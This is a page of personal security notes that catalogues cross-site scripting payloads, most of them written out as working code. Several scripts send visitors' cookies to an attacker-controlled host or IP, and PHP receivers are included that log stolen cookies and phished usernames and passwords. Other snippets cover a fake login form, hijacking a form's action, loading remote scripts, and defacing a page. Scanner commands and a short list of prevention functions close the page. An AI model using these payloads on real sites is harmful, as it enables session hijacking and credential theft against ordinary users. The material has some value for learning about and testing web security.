Link
n0a110w.github.io

This site uses Just the Docs, a documentation theme for Jekyll.

Search
  1. XSS Examples
    1. Simple Alert Box
    2. Cookie Stealing
      1. example one
      2. example two
      3. other examples
    3. Phishing
      1. example one
      2. example two
    4. Stored XSS -> Image onmouseover
    5. Call a script from an external source
    6. Post data to form
    7. DOM Deface
  2. Tool scanning for XSS vulnerabilities
    1. ARACHNI: https://www.arachni-scanner.com/
    2. NMAP: (NSE scripts: http-dombased-xss , http-stored-xss , http-phpself-xss)
    3. XSSER
  3. Securing your code / preventing XSS
  4. Resources / More
    1. Links
      1. Cheatsheets and more
      2. Tools
      3. wordlists

XSS Examples

Simple Alert Box 

<script>alert('attacked')</script>

example one 

<script>document.location="http://localhost/cookie.php?q="+document.cookie;</script>

example two 

<a href="javascript:document.location='http://localhost/cookie.php?q='+document.cookie;">CLICK ME!</a>

cookie.php could look like this:

<?php
$file = "cookie.txt"
$act = fopen($file, 'a');
$cookie = $_GET['q'];
fwrite($act,$cookie);
fclose($act);
?>

other examples 

<script>new image().src="http://<attacker's IP Address>/b.php?"+document.cookie;</script>
<script>new Image().src="http://111.11.11.11/"+encodeURI(document.cookie)</script>
<script>$.post("http://111.11.11.11", {cookie:document.cookie})</script>

Phishing

example one 

<form name ="phish" action="http://localhost/phish.php" method="post">
<br><br><hr>
<h3>Login now:</h3><br><br>
Enter Username: <br><input type="text" name="email"><br><Enter Password:<br><input type="password" name="pass"><br> 
<input type="submit" name="Login" value="Login">
</form>
<br><br><hr>

phish.php could look like this:

<?php
$file = fopen('phished.txt', 'a');
$fwrite($file, 'Email = ' . $_POST['email'] . PHP_EOL);
$fwrite($file, 'Pass = ' . $_POST['pass'] . PHP_EOL . PHP_EOL);
fclose($file);
header("Location: http://exapmle.com/xss.html");
die();
?>

example two

In this case, the page will remain completely unchanged. SSL will not help the victim either.

forms[0].action.value="http://hackersite.com/phish.cgi";

Stored XSS -> Image onmouseover 

<IMG SRC=# onmouseover="alert(document.cookie)">

Call a script from an external source 

<script>document.write('<script src=http://example.com/xss.js></script>')</script>

Post data to form 

<script>$.post("<http form>", {parameter: "<value>"})</script>

DOM Deface 

# deface with image
document.body.innerHTML="<img src="#" height="500%" width="700%" ></img>";

Tool scanning for XSS vulnerabilities

ARACHNI: https://www.arachni-scanner.com/

NMAP: (NSE scripts: http-dombased-xss , http-stored-xss , http-phpself-xss) 

nmap -p80 --script http-stored-xss.nse --script-args=httpspider,maxpagecount=200 <target-host>

XSSER 

xsser -c100 --Cw=4 -U <target-host>
c : number of pages to crawl
--Cw : depth of crawler 
-u : URL

Securing your code / preventing XSS

Listed below are some common functions used to prevent XSS

  • asp.net: AntiXss.htmlencode()
  • javascript: AntiXSS.JavascriptEncode()
  • php: htmlentities() , htmlspecialchars() , trim() , stripslashes() , mysql_real_escape_string() , more

Resources / More

Cheatsheets and more

XSS Filter Evasion Cheat Sheet from OWASP
xss payloads cheatsheet
collection of xss payloads, tools and reference
bypassing XSS filtering by s0md3v

Tools

XSS Fuzzer
xcampo

wordlists

a payloads.txt
another payloads.txt